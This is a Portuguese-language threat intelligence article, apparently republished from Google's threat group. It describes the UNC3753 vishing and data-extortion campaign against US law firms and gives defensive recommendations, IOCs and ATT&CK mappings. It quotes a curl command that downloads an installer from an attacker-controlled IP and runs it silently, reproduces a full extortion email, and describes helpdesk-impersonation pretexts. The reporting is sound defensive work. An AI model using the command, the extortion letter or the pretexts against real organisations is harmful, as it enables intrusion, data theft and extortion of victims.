Campanha direcionada de vishing contra escritórios de advocacia nos EUA: o que empresas brasileiras precisam saber
TL;DR: Entre janeiro e maio de 2026, o grupo UNC3753 (Luna Moth / Silent Ransom Group) executou uma campanha de extorsão contra dezenas de organizações nos EUA, usando vishing (voice phishing) e acesso físico disfarçado de suporte de TI. O ataque inteiro — do primeiro contato à extorsão — ocorre em menos de 24 horas. Para empresas brasileiras, o alerta é claro: perímetros técnicos robustos não protegem contra engenharia social bem executada. A lição é que a segurança precisa tratar o fator humano e o controle de acesso físico como parte do perímetro defensivo.
Introdução
Entre janeiro e maio de 2026, a Mandiant identificou uma campanha de extorsão de dados financeiramente motivada, executada pelo cluster de ameaças UNC3753 (também rastreado como "Luna Moth", "Chatty Spider" e "Silent Ransom Group"), visando dezenas de organizações nos setores jurídico, profissional e financeiro nos Estados Unidos.
O UNC3753 utiliza técnicas de vishing (voice phishing) e engenharia social para obter acesso remoto a ambientes corporativos. Usando pretextos como migração de dados ou e-mails sobre faturas, os atores iniciam conversas telefônicas se passando por suporte de TI e convencem os alvos a hospedar sessões de compartilhamento de tela e baixar utilitários de remote monitoring and management (RMM). Uma vez dentro do ambiente, os atores realizam buscas para localizar e exfiltrar dados altamente sensíveis, ou manipulam a vítima para executar essas ações. Esses dados incluem acordos legais proprietários, informações pessoais identificáveis (PII) e registros financeiros para posterior pedido de extorsão.
Notavelmente, em casos possivelmente ligados ao UNC3753, os atores acessaram os sistemas das vítimas pessoalmente. Nesses incidentes físicos, indivíduos se passando por técnicos de TI entraram em escritórios corporativos para tentar a exfiltração direta de dados de um endpoint usando dispositivos de armazenamento USB.
Este artigo detalha o ciclo de vida técnico do grupo de ameaças em recentes engajamentos de resposta a incidentes da Mandiant Consulting, destaca táticas como o direcionamento físico a escritórios e fornece recomendações práticas para proteger endpoints e infraestrutura.
Detalhamento da Ameaça
O ciclo de vida da campanha UNC3753 reflete um modelo operacional otimizado e de ritmo acelerado. Em muitos incidentes investigados pela Mandiant, toda a sequência do ataque — do contato inicial com o alvo ao roubo de dados e extorsão — ocorreu dentro de um único dia útil. Recentemente, a Mandiant observou buscas, preparação e roubo de dados iniciados em menos de uma hora.
O grupo frequentemente inicia as campanhas usando iscas de e-mail inócuas com tema de fatura, enviadas de contas de e-mail de consumidor controladas pelos atores. Essas mensagens não contêm links ativos ou anexos maliciosos. Em vez disso, geralmente contêm uma mensagem genérica e breve, como: "olá, aqui está a fatura que conversamos ontem". O Google Threat Intelligence Group (GTIG) avalia que o objetivo principal desses e-mails é estabelecer um pretexto, levantando preocupações de segurança internas no alvo para torná-lo mais suscetível a ligações telefônicas de acompanhamento.
Figura 1: Ciclo de vida do ataque UNC3753
Como o grupo consegue o acesso inicial?
O núcleo do mecanismo de entrada do UNC3753 depende de vishing direcionado. A Mandiant observou o grupo mirando funcionários de todos os níveis hierárquicos, que geralmente estão listados publicamente nos sites das organizações, para coletar números de telefone e endereços de e-mail. Agindo como membros da equipe interna de helpdesk ou segurança, os atores fazem ligações diretas para esses funcionários.
Os chamadores usam uma variedade de instruções verbais para orientar o comportamento do alvo. Sob o pretexto de resolver um problema de segurança ou ajudar em um projeto de migração de dados corporativos, eles constroem confiança e direcionam o alvo a participar de uma sessão de compartilhamento de tela.
Como eles assumem o controle remoto da máquina?
Uma vez engajado o alvo, os atores contornam os controles de segurança de perímetro automatizados e filtros de e-mail ao instruir o usuário a baixar e executar aplicativos de compartilhamento de tela.
Utilitários de compartilhamento de tela: O UNC3753 instrui os alvos a iniciar sessões de desktop remoto e suporte usando serviços nativos ou comerciais, incluindo Zoom, Microsoft Terminal Services, Microsoft Teams e Quick Assist. Em uma intrusão facilitada pelo Teams, o ator realizou cinco ligações distintas com o mesmo alvo durante três dias.
Agentes RMM comerciais: O UNC3753 frequentemente tenta estabelecer acesso mais persistente enganando os alvos para baixar instaladores do AnyDesk, Bomgar ou Zoho Assist. Em um engajamento, o ator tentou instalar um "agente RMM SuperOps" convencendo o alvo a baixar e executar um payload via comando cURL.
Entrega de mensagens via Privnote: Os atores utilizam consistentemente privnote[.]com, um utilitário de texto autodestrutivo baseado na web, para transmitir links de instalação e comandos aos alvos. Essa técnica de evasão garante que os vetores de copiar-e-colar não deixem footprint permanente nos navegadores ou logs de chat.
Exemplo de string de staging de comando cURL observada em sessões remotas do UNC3753:
curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet
Como eles se movem dentro da infraestrutura?
As intrusões abusaram de ambientes remotos BYOD (Bring Your Own Device) para acessar ativos corporativos internos. Em casos separados da Mandiant Consulting, o UNC3753 estabeleceu sessões do Zoom diretamente nos endpoints BYOD pessoais dos alvos. Usando esses laptops pessoais comprometidos, eles acessaram a infraestrutura de desktop virtual corporativo (VDI) usando clientes nativos, como Windows 365 (Windows365.exe) ou clientes Citrix.
Uma vez garantido o acesso ao ambiente VDI, os atores pivoteiam para os sistemas de arquivos corporativos:
- Enumeração do Sistema: Os atores mapeiam diretórios locais, enumeram pastas ativas do OneDrive e percorrem unidades de rede mapeadas.
- Colheita Direcionada a Repositórios de Documentos: Os atores miram repositórios específicos de armazenamento de documentos jurídicos.
- Busca por Palavras-chave e Staging de Arquivos: Os atores usam funções de busca por palavras-chave dentro do iManage para localizar pastas altamente sensíveis contendo registros fiscais (Formulários W-2, W-9 e 1099), arquivos de auditoria, acordos de clientes corporativos e números de Seguro Social (SSNs). Os resultados preparados são compilados e classificados em subdiretórios acessíveis ao alvo, principalmente dentro da pasta Downloads do usuário ou no caminho nativo do perfil Roaming.
Roubo de Dados
O UNC3753 exfiltra os dados preparados usando uma variedade de métodos para contornar os controles de segurança. Eles frequentemente usam versões portáteis do WinSCP ou Rclone. Em outros casos, eles simplesmente fazem login em uma conta de compartilhamento de arquivos de consumidor controlada pelo ator diretamente no navegador da web da vítima e fazem upload em lote dos arquivos roubados.
- Staging em Armazenamento em Nuvem: Os atores instruem os alvos — ou controlam diretamente suas telas — a arrastar e soltar pastas preparadas em contas de compartilhamento de arquivos de consumidor controladas pelos atores. Em várias intrusões, o destino da exfiltração incluía pastas explicitamente renomeadas para imitar a marca da organização vítima.
- Utilitários FTP: Quando os uploads baseados em navegador são restritos por controles de endpoint, os atores baixam binários de clientes FTP e SFTP, principalmente WinSCP, para exfiltrar pacotes em massa. Em um incidente, o grupo exfiltrou 1,7 gigabytes de dados da pasta OneDrive local de um alvo para uma conta do Google Drive antes de fazer pivot para uma sessão VDI e exfiltrar mais 14,4 gigabytes usando WinSCP. O Google tomou medidas contra este ator, desabilitando as contas e ativos do Drive associados a esta atividade.
- Encaminhamento de E-mail: Os atores também fizeram com que as vítimas preparassem arquivos de repositórios internos do iManage e as instruíram a enviar os arquivos para endereços de e-mail de consumidor controlados pelos atores a partir da caixa de correio do alvo.
Táticas de Extorsão do Ator de Ameaça
O cluster de ameaças envia comunicações de extorsão sem marca por e-mail logo após o roubo bem-sucedido dos dados, geralmente em até 30 minutos após sair do ambiente alvo.
Essas cartas de extorsão altamente agressivas dão às organizações um prazo de três dias para responder e iniciar negociações de resgate. Se a organização vítima não responder, os atores declaram que ligarão e enviarão e-mails para funcionários e clientes externos diretamente para alertá-los sobre a violação de dados. As cartas de extorsão enfatizam explicitamente que o vazamento comprometerá a confiança do cliente, atrairá multas regulatórias substanciais e sugere que clientes externos processem a organização vítima por má gestão de dados. Além disso, como parte de uma mensagem de acompanhamento, o grupo ameaçou publicar todos os arquivos exfiltrados no site de vazamento de dados LEAKEDDATA (DLS).
Exemplo de E-mail de Extorsão
| Exemplo de e-mail de extorsão do UNC3753 |
|---|
| Assunto: [Nome da Vítima] perdeu dados confidenciais de seus clientes. Muito Importante! |
| Olá, |
Temos que informar que obtivemos acesso ao banco de dados da corporação [Nome da Vítima] e pegamos um conjunto de dados muito grande. Estivemos em sua rede por semanas em vários sistemas, visando arquivos proprietários e confidenciais, e conseguimos obter o que procurávamos, bem como os dados de muitos clientes.
Este é um problema real que coloca a existência de sua empresa em perigo e, para provar, anexamos capturas de tela que confirmam a posse dos arquivos.
Responda ao nosso e-mail e mostraremos a árvore de arquivos completa e os arquivos reais.
Somos um grupo de elite que está neste negócio há muito tempo. Temos nosso próprio site onde publicamos os dados e milhares de indivíduos seguem nosso trabalho, e temos conexões em diferentes mídias sociais de negócios. Mas, o mais importante, é que queremos devolver seus dados pacificamente e o mais rápido possível.
Garantiremos a exclusão completa do banco de dados de nossos servidores, evidência em vídeo de nós excluindo os arquivos, privacidade de nossa comunicação e nosso conselho de segurança com uma explicação de como entramos em sua rede e como corrigir a vulnerabilidade que encontramos.
Para resolvermos este problema, você precisa nos enviar um e-mail e começar a se comunicar conosco. Esperamos encontrar uma solução financeira que seja aceitável para ambas as partes.
Em caso de ignorância ou não acordo, notificaremos seus funcionários, parceiros e clientes, após o que publicaremos seus dados. Você receberá reclamações de indivíduos e entidades legais por vazamento de informações e quebra de contratos, seus negócios atuais serão encerrados. Jornalistas e outros vão vasculhar seus documentos, encontrando inconsistências ou violações neles. Sua organização perderá sua reputação, as ações cairão de preço e sua organização será forçada a fechar.
Lembramos que seus dados podem ser usados por muitos outros hackers e criminosos na dark web, bem como por seus concorrentes e inimigos, caso vazemos os dados.
A aplicação da lei não vai ajudar, estamos fora de sua jurisdição e já pegamos todos os dados críticos. Eles só vão te dizer para não se comunicar conosco e ser os primeiros a multar você.
Assim que você entrar em contato, mostraremos todos os arquivos que obtivemos, para que você entenda a seriedade deste problema e a necessidade de prosseguir para as negociações.
Nossa comunicação permanecerá 100% privada antes e depois do acordo. Podemos mostrar a prova disso também.
Toda comunicação adicional pode ser feita através deste endereço de e-mail.
Não perca tempo, pois ele está correndo. Envie-nos uma mensagem hoje, para que não tenhamos que começar a ligar para seus funcionários amanhã. Você terá 3 dias para começar a se comunicar.
Aqui anexamos algumas capturas de tela confirmando tudo acima. Responda a este e-mail e enviaremos a árvore de arquivos. |
Figura 2: Exemplo de nota de extorsão do UNC3753
Site de Vazamento de Dados
Figura 3: LEAKEDDATA DLS (parcialmente redigido; cortado)
Atividade Suspeita do UNC3753 Envolvendo Acesso Físico
Embora o UNC3753 dependa principalmente de vetores digitais, o GTIG avalia que atores de ameaças associados também tentaram o roubo direto de dados usando acesso físico e presencial. Esta tática crescente é corroborada por um Alerta FBI Cyber FLASH recente destacando instâncias onde atores do Silent Ransom Group aproveitaram o acesso físico ao escritório para exfiltrar dados corporativos via mídia USB removível.
De acordo com o comunicado do FBI, se as tentativas remotas de engenharia social falharem, os atores enviarão um indivíduo ao local físico da vítima. O ator no local alegará que precisa fazer uma imagem do dispositivo ou criar backups locais para resolver um problema de segurança. Uma vez que obtêm acesso ao endpoint, eles tentam exfiltrar dados corporativos diretamente para um drive externo.
Embora as evidências forenses limitadas e a ausência de uma tentativa de extorsão subsequente impeçam a atribuição formal, o GTIG avalia que essas intrusões físicas provavelmente estão associadas ao UNC3753 com base em sobreposições estruturais, de cronograma e de direcionamento.
Atribuição
O GTIG atribui esta campanha e operações de engenharia social relacionadas ao UNC3753 com base em sobreposições de infraestrutura, rastreamento de registradores de domínio, victimologia e diretórios de staging de alvos. UNC3753 (aliases: "Luna Moth", "Chatty Spider" e "Silent Ransom Group (SRG)") é um cluster de ameaças financeiramente motivado ativo desde pelo menos março de 2022. O UNC3753 tem sobreposições de TTP com o UNC2686, um cluster de ameaças que conduziu campanhas no estilo "Bazarcall" desde o início de 2021. O UNC3753 implantou o LOCKBIT.BLACK em 2022, mas desde então priorizou operações de extorsão apenas com roubo de dados, geralmente envolvendo ameaças de postar arquivos roubados no LEAKEDDATA DLS. O cluster de ameaças depende fortemente de ferramentas de Remote Monitoring and Management (RMM), ao contrário do UNC2686, que implantou variantes do BAZARLOADER, bem como TRICKBOT, URSNIF e SILENTNIGHT. Inicialmente, o UNC3753 usava iscas de e-mail de cobrança com tema de assinatura (como alertas falsos de renovação de software), geralmente com anexos PDF contendo números de telefone para call centers controlados pelos atores. A partir de março de 2025, o cluster mudou de tática para se passar por funcionários internos de helpdesk de TI corporativo.
Remediação e Hardening
Para mitigar o risco de vishing, intrusões físicas em escritórios e controle não autorizado de endpoints, o GTIG recomenda que as organizações implementem os seguintes controles de mitigação:
Treinamento de Usuários
Realize treinamentos de conscientização de usuário especificamente adaptados às táticas, técnicas e procedimentos do UNC3753.
Políticas de Acesso Físico e Verificação
Implemente controles rígidos de verificação de identidade fora da banda para todos os contratados externos, equipe técnica e visitantes das instalações. Exija os seguintes controles físicos:
- Exija que os visitantes apresentem credenciais oficiais e identificação com foto.
- Exija que a equipe da recepção copie e registre todas as IDs de visitantes físicos antes de conceder acesso.
- Verifique a chegada de todos os técnicos em relação a ordens de serviço pré-agendadas diretamente com a organização matriz verificada ou despachante de helpdesk.
- Aplique uma política que exija que o pessoal de serviço técnico físico seja acompanhado por um supervisor corporativo em tempo integral.
Controles de Acesso Condicional Remoto
Implemente políticas de acesso condicional remoto para garantir que apenas dispositivos corporativos possam autenticar em instâncias de Virtual Desktop (VDI) ou dispositivos de Virtual Private Network (VPN). Isso facilita maior controle organizacional e visibilidade para o uso potencial de Remote Monitoring and Management.
Reforce Controles Estritos de RMM e Software de Compartilhamento de Tela
Audite os ambientes corporativos para bloquear a instalação e execução de utilitários não autorizados de monitoramento, gerenciamento e suporte remotos. Aplique políticas de controle de aplicativos (ex: Windows Defender Application Control ou ferramentas de proteção de endpoint de terceiros) para restringir a execução de binários não aprovados. As organizações também podem considerar restringir os recursos interativos de controle de tela em plataformas de reunião virtual autorizadas, como Zoom e Teams.
Hardening de Mídia Removível em Endpoints
Para neutralizar vetores de exfiltração física, desative as capacidades de leitura/gravação para todos os dispositivos de armazenamento em massa USB externos. Aplique Group Policy Objects (GPOs) ou configurações MDM para restringir:
- Instalação de dispositivos de armazenamento USB.
- Acesso a mídia removível.
- Gravações em mídia óptica em todos os endpoints corporativos e sistemas BYOD que utilizam entrada VDI.
Monitoramento de Rede e Controle de Egresso
Monitore logs de firewall, fluxos de rede e logs de execução de endpoint para ações indicativas de exfiltração e staging. Especificamente:
- Bloqueie ou alerte sobre conexões de saída para APIs de compartilhamento de arquivos e e-mails não autorizados.
- Garanta que o log de sessão completo com bytes transferidos esteja ativado nas configurações do log de firewall.
- Monitore o tráfego SSH (Porta 22) de VDIs e endpoints internos para transferências de alto volume do WinSCP e Rclone.
Log de Aplicativos e Auditoria de Acesso
Revise as métricas de autenticação e acesso para armazenamentos de documentos críticos para identificar perfis de colheita em massa.
- Configure alertas em tempo real em iManage, SharePoint e diretórios de e-mail corporativos para pesquisas rápidas de arquivos, picos de termos de pesquisa e downloads em massa de arquivos.
- Implemente autenticação multifator (MFA) em aplicativos de repositório de dados críticos para os negócios, como iManage.
- Implemente controles de autenticação BYOD rigorosos, exigindo consultas de step-up de MFA ao acessar nós VDI.
Perspectivas e Implicações
O direcionamento de organizações de serviços jurídicos e profissionais dos EUA por atores financeiramente motivados é um risco persistente do setor. As empresas de serviços jurídicos representam alvos de alto valor para atores de extorsão. Elas mantêm repositórios concentrados de arquivos de transação de clientes extremamente sensíveis, planos de fusão e aquisição, segredos comerciais de clientes e relatórios regulatórios corporativos. Os grupos de ameaças reconhecem que as entidades jurídicas estão sujeitas a forte exposição reputacional e regulatória e podem estar altamente motivadas a resolver situações de extorsão discretamente para proteger sua posição profissional.
Os atores de ameaças reconhecem que mirar o elemento humano — especificamente usando engenharia social guiada por voz — permite que eles contornem facilmente perímetros técnicos robustos, gateways de segurança da web e configurações de MFA.
Finalmente, a integração de intrusões físicas e presenciais representa uma escalada na capacidade da ameaça. Embora as defesas baseadas em log e a telemetria de endpoint tenham amadurecido, os limites físicos corporativos são frequentemente protegidos apenas por procedimentos administrativos. As organizações devem fazer a transição para uma postura de segurança unificada que trate o controle de acesso físico às instalações e as políticas de hardware baseadas em endpoint como componentes iguais de seu perímetro defensivo.
Site de Vazamento de Dados (DLS)
O UNC3753 utiliza a seguinte plataforma web para divulgar as identidades das vítimas e seus dados comprometidos.
- hxxps[:]//business-data-leaks[.]com
Domínios de Phishing
O GTIG identificou registros de infraestrutura por supostos atores do UNC3753 utilizando convenções de nomenclatura específicas, avaliadas como suporte para suas atividades contínuas de engenharia social e vishing.
- <organização>-itdesk[.]com
- <organização>-it[.]com
- <organização>-helpdesk[.]com
Indicadores de Comprometimento (IOCs)
Para auxiliar a comunidade em geral na caça e identificação da atividade descrita neste artigo, incluímos indicadores de comprometimento (IOCs) em uma Coleção GTI para usuários registrados.
| Tipo de IOC | Indicador |
|---|---|
| Endereço IPv4 | 192.236.147.131 |
| Endereço IPv4 | 192.236.147.138 |
| Endereço IPv4 | 193.141.60.212 |
| Endereço IPv4 | 192.236.154.158 |
| Endereço IPv4 | 192.236.146.173 |
| Endereço IPv4 | 174.169.162.62 |
| Endereço IPv4 | 64.94.84.97 |
Google Security Operations (SecOps)
Os clientes do Google SecOps têm acesso a essas regras de categoria ampla e outras sob o pacote de regras Mandiant Intel Emerging Threats. A atividade discutida neste artigo é detectada no Google SecOps sob os nomes de regras:
- Executar Arquivos MSI Baixados via Curl
- Suspeita de Exfiltração via Rclone
MITRE ATT&CK
| Tática | ID da Técnica | Nome da Técnica |
|---|---|---|
| Acesso Inicial | T1566.004 | Phishing: Spearphishing Voice |
| Acesso Inicial | T1133 | Serviços Remotos Externos |
| Execução | T1204.002 | Execução do Usuário: Arquivo Malicioso |
| Execução | T1059.001 | Command and Scripting Interpreter: PowerShell |
| Execução | T1059.003 | Command and Scripting Interpreter: Windows Command Shell |
| Execução | T1569.002 | System Services: Service Execution |
| Persistência | T1053.005 | Scheduled Task/Job: Scheduled Task |
| Persistência | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys |
| Defesa Evasão | T1036.005 | Masquerading: Match Legitimate Name or Location |
| Defesa Evasão | T1553.002 | Subvert Trust Controls: Code Signing |
| Defesa Evasão | T1562.001 | Impair Defenses: Disable or Modify Tools |
| Defesa Evasão | T1070.001 | Indicator Removal: Clear Windows Event Logs |
| Acesso a Credenciais | T1003.001 | OS Credential Dumping: LSASS Memory |
| Acesso a Credenciais | T1003.002 | OS Credential Dumping: Security Account Manager |
| Descoberta | T1083 | File and Directory Discovery |
| Descoberta | T1135 | Network Share Discovery |
| Descoberta | T1046 | Network Service Discovery |
| Movimentação Lateral | T1219 | Remote Access Software |
| Movimentação Lateral | T1021.001 | Remote Services: Remote Desktop Protocol |
| Movimentação Lateral | T1021.004 | Remote Services: SSH |
| Coleta | T1005 | Data from Local System |
| Comando e Controle | T1572 | Protocol Tunneling |
| Exfiltração | T1020 | Automated Exfiltration |
| Exfiltração | T1567.002 | Exfiltration Over Web Service: Exfiltration to Cloud Storage |
| Exfiltração | T1052.001 | Exfiltration Over Physical Medium |
| Impacto | T1486 | Data Encrypted for Impact |
Perguntas Frequentes
-
O que é a campanha UNC3753 e por que ela é relevante para o Brasil?
É uma campanha de extorsão de dados que combina vishing (ligações se passando por suporte de TI), engenharia social e, em alguns casos, acesso físico a escritórios. Embora focada em escritórios de advocacia nos EUA, a tática é facilmente replicável contra empresas brasileiras que lidam com dados sensíveis, já que explora o elo humano, não falhas técnicas. -
Como o grupo UNC3753 consegue acesso remoto aos sistemas?
Eles ligam para funcionários se passando pela equipe de TI interna e pedem que a pessoa instale ferramentas legítimas de acesso remoto (AnyDesk, Zoho Assist, Quick Assist) ou inicie uma reunião no Zoom/Teams. O link para download é enviado via Privnote, um serviço de mensagens autodestrutivas, para não deixar rastros. -
O que acontece depois que eles ganham acesso ao sistema?
Em menos de uma hora, eles mapeiam diretórios, pastas do OneDrive e drives de rede, usam palavras-chave para localizar documentos fiscais, contratos e dados de clientes em sistemas como iManage, e exfiltram os arquivos via WinSCP, Rclone ou upload direto para contas de armazenamento em nuvem controladas por eles. -
Como funciona a extorsão após o roubo de dados?
Cerca de 30 minutos após sair do ambiente, o grupo envia um e-mail de extorsão com prazo de três dias para negociação. Se a vítima não responde, eles ameaçam ligar para funcionários e clientes, publicar os dados no site LEAKEDDATA e expor a violação — jogando com o medo de danos à reputação e multas regulatórias. -
O que empresas brasileiras podem fazer para se proteger contra esse tipo de ataque?
Além de treinar funcionários para reconhecer ligações falsas de TI, é essencial: (1) bloquear a instalação de ferramentas RMM não autorizadas via política de aplicação (ex: Windows Defender Application Control); (2) restringir acesso a VDI apenas a dispositivos corporativos gerenciados; (3) desabilitar a gravação em mídia removível por GPO; (4) monitorar tráfego SSH (porta 22) para transferências em massa com WinSCP/Rclone; e (5) configurar alertas em repositórios como iManage para picos de busca e download.
Artigo originalmente publicado por Google Threat Intelligence Group em Cloud Blog.
